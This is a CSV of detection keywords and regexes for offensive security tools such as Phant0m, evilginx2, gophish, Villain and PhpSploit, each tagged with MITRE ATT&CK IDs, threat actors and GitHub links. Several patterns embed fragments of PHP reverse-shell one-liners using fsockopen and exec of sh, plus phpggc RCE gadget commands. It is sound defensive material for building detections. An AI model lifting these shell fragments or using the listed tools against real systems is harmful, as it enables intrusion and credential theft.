"*pgpwde2john.py*",".{0,1000}pgpwde2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54753"
"*ph4nt0mbyt3/Darkside*",".{0,1000}ph4nt0mbyt3\/Darkside.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","54759"
"*ph4ntonn/Stowaway*",".{0,1000}ph4ntonn\/Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","54760"
"*Phant0m scm 1*",".{0,1000}Phant0m\sscm\s1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54761"
"*Phant0m scm 2*",".{0,1000}Phant0m\sscm\s2.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54762"
"*Phant0m wmi*",".{0,1000}Phant0m\swmi.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54763"
"*phant0m.cna*",".{0,1000}phant0m\.cna.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54764"
"*Phant0m_cobaltstrike*",".{0,1000}Phant0m_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","54765"
"*phant0m-exe.*",".{0,1000}phant0m\-exe\..{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54766"
"*Phant0m-master.zip*",".{0,1000}Phant0m\-master\.zip.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54767"
"*phant0m-rdll*",".{0,1000}phant0m\-rdll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54768"
"*phantom_thread * shc *",".{0,1000}phantom_thread\s.{0,1000}\sshc\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54769"
"*PhantomService.csproj*",".{0,1000}PhantomService\.csproj.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","54770"
"*PhantomService.exe*",".{0,1000}PhantomService\.exe.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","54771"
"*phillips321/adaudit*",".{0,1000}phillips321\/adaudit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","54772"
"*phish_test.go*",".{0,1000}phish_test\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","54774"
"*phish_windows_credentials.rb*",".{0,1000}phish_windows_credentials\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54775"
"*Phish-Creds.ps1*",".{0,1000}Phish\-Creds\.ps1.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","54776"
"*phishDomain = phishDomain +*",".{0,1000}phishDomain\s\=\sphishDomain\s\+.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#content","N/A","10","","N/A","","","","54777"
"*phishing-HTML-linter.*",".{0,1000}phishing\-HTML\-linter\..{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","54778"
"*phishlets *",".{0,1000}phishlets\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","54779"
"*phising_attack.py*",".{0,1000}phising_attack\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","54780"
"*phkbamefinggmakgklpkljjmgibohnba*",".{0,1000}phkbamefinggmakgklpkljjmgibohnba.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","54781"
"*phoneinfoga scan -n *",".{0,1000}phoneinfoga\sscan\s\-n\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54784"
"*PhoneInfoga*",".{0,1000}PhoneInfoga.{0,1000}","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Reconnaissance","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","N/A","10","14150","3991","2024-06-30T15:29:37Z","2018-10-25T09:19:47Z","54785"
"*photon.py -u * -l 3 -t 100 --wayback*",".{0,1000}photon\.py\s\-u\s.{0,1000}\s\-l\s3\s\-t\s100\s\-\-wayback.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54786"
"*Php Backdoor v 1.0 by ^Jerem*",".{0,1000}Php\sBackdoor\sv\s1\.0\sby\s\^Jerem.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","54787"
"*php -f *.php -- -o myShell.php*",".{0,1000}php\s\-f\s.{0,1000}\.php\s\-\-\s\-o\smyShell\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/b374k/b374k","1","0","N/A","N/A","N/A","10","2462","747","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z","54788"
"*PHP Meterpreter Stageless Reverse TCP*",".{0,1000}PHP\sMeterpreter\sStageless\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54789"
"*php -q -S 0.0.0.0:8111*",".{0,1000}php\s\-q\s\-S\s0\.0\.0\.0\:8111.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","54790"
"*php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s*",".{0,1000}php\s\-r\s\'\$s\=socket_create\(AF_INET,SOCK_STREAM,SOL_TCP\)\;socket_bind\(\$s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54791"
"*php -r '$sock=fsockopen(*,*);exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54792"
"*php -r '$sock=fsockopen(*,*);passthru(""sh ",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;passthru\(\""sh\s","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54793"
"*php -r '$sock=fsockopen(*,*);popen(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;popen\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54794"
"*php -r '$sock=fsockopen(*,*);shell_exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;shell_exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54795"
"*php -r '$sock=fsockopen(*,*);system(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;system\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54796"
"*php -r '$sock=fsockopen(*,*proc_open(""sh"",*",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}proc_open\(\""sh\"",.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54797"
"*php -r *fsockopen*exec(*/bin/sh*",".{0,1000}php\s\-r\s.{0,1000}fsockopen.{0,1000}exec\(.{0,1000}\/bin\/sh.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","54799"
"*php -S 0.0.0.0:9056 &*",".{0,1000}php\s\-S\s0\.0\.0\.0\:9056\s\&.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","54801"
"*php/meterpreter_reverse_tcp*",".{0,1000}php\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54802"
"*php/reverse_php*",".{0,1000}php\/reverse_php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54803"
"*php_filter_chain_generator --chain *php system*'cmd']*",".{0,1000}php_filter_chain_generator\s\-\-chain\s.{0,1000}php\ssystem.{0,1000}\'cmd\'\].{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54804"
"*php_passthru_reverse_tcp.py*",".{0,1000}php_passthru_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54805"
"*php_popen_reverse_tcp.py*",".{0,1000}php_popen_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54806"
"*php_proc_open_reverse_tcp.py*",".{0,1000}php_proc_open_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54807"
"*php_reverse_shell_mini.php*",".{0,1000}php_reverse_shell_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","54808"
"*php_reverse_shell_older.php*",".{0,1000}php_reverse_shell_older\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","54809"
"*php_reverse_shell_older_mini.php*",".{0,1000}php_reverse_shell_older_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","54810"
"*PHP-Code-injection.*",".{0,1000}PHP\-Code\-injection\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54811"
"*PHP-Code-Injections-Payloads.*",".{0,1000}PHP\-Code\-Injections\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54812"
"*phpggc -l*",".{0,1000}phpggc\s\-l.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54813"
"*phpggc monolog/rce1 assert 'phpinfo()'*",".{0,1000}phpggc\smonolog\/rce1\sassert\s\'phpinfo\(\)\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54814"
"*phpggc symfony/rce1 id*",".{0,1000}phpggc\ssymfony\/rce1\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54815"
"*phpmyadmin_credsteal.*",".{0,1000}phpmyadmin_credsteal\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54816"
"*PHPRedirector*AutoOAuthFlow.py*",".{0,1000}PHPRedirector.{0,1000}AutoOAuthFlow\.py.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","54817"
"*php-reverse-shell.php*",".{0,1000}php\-reverse\-shell\.php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54818"
"*PhpSploit*",".{0,1000}PhpSploit.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","0","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54819"
"*phpsploit.txt*",".{0,1000}phpsploit\.txt.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54820"
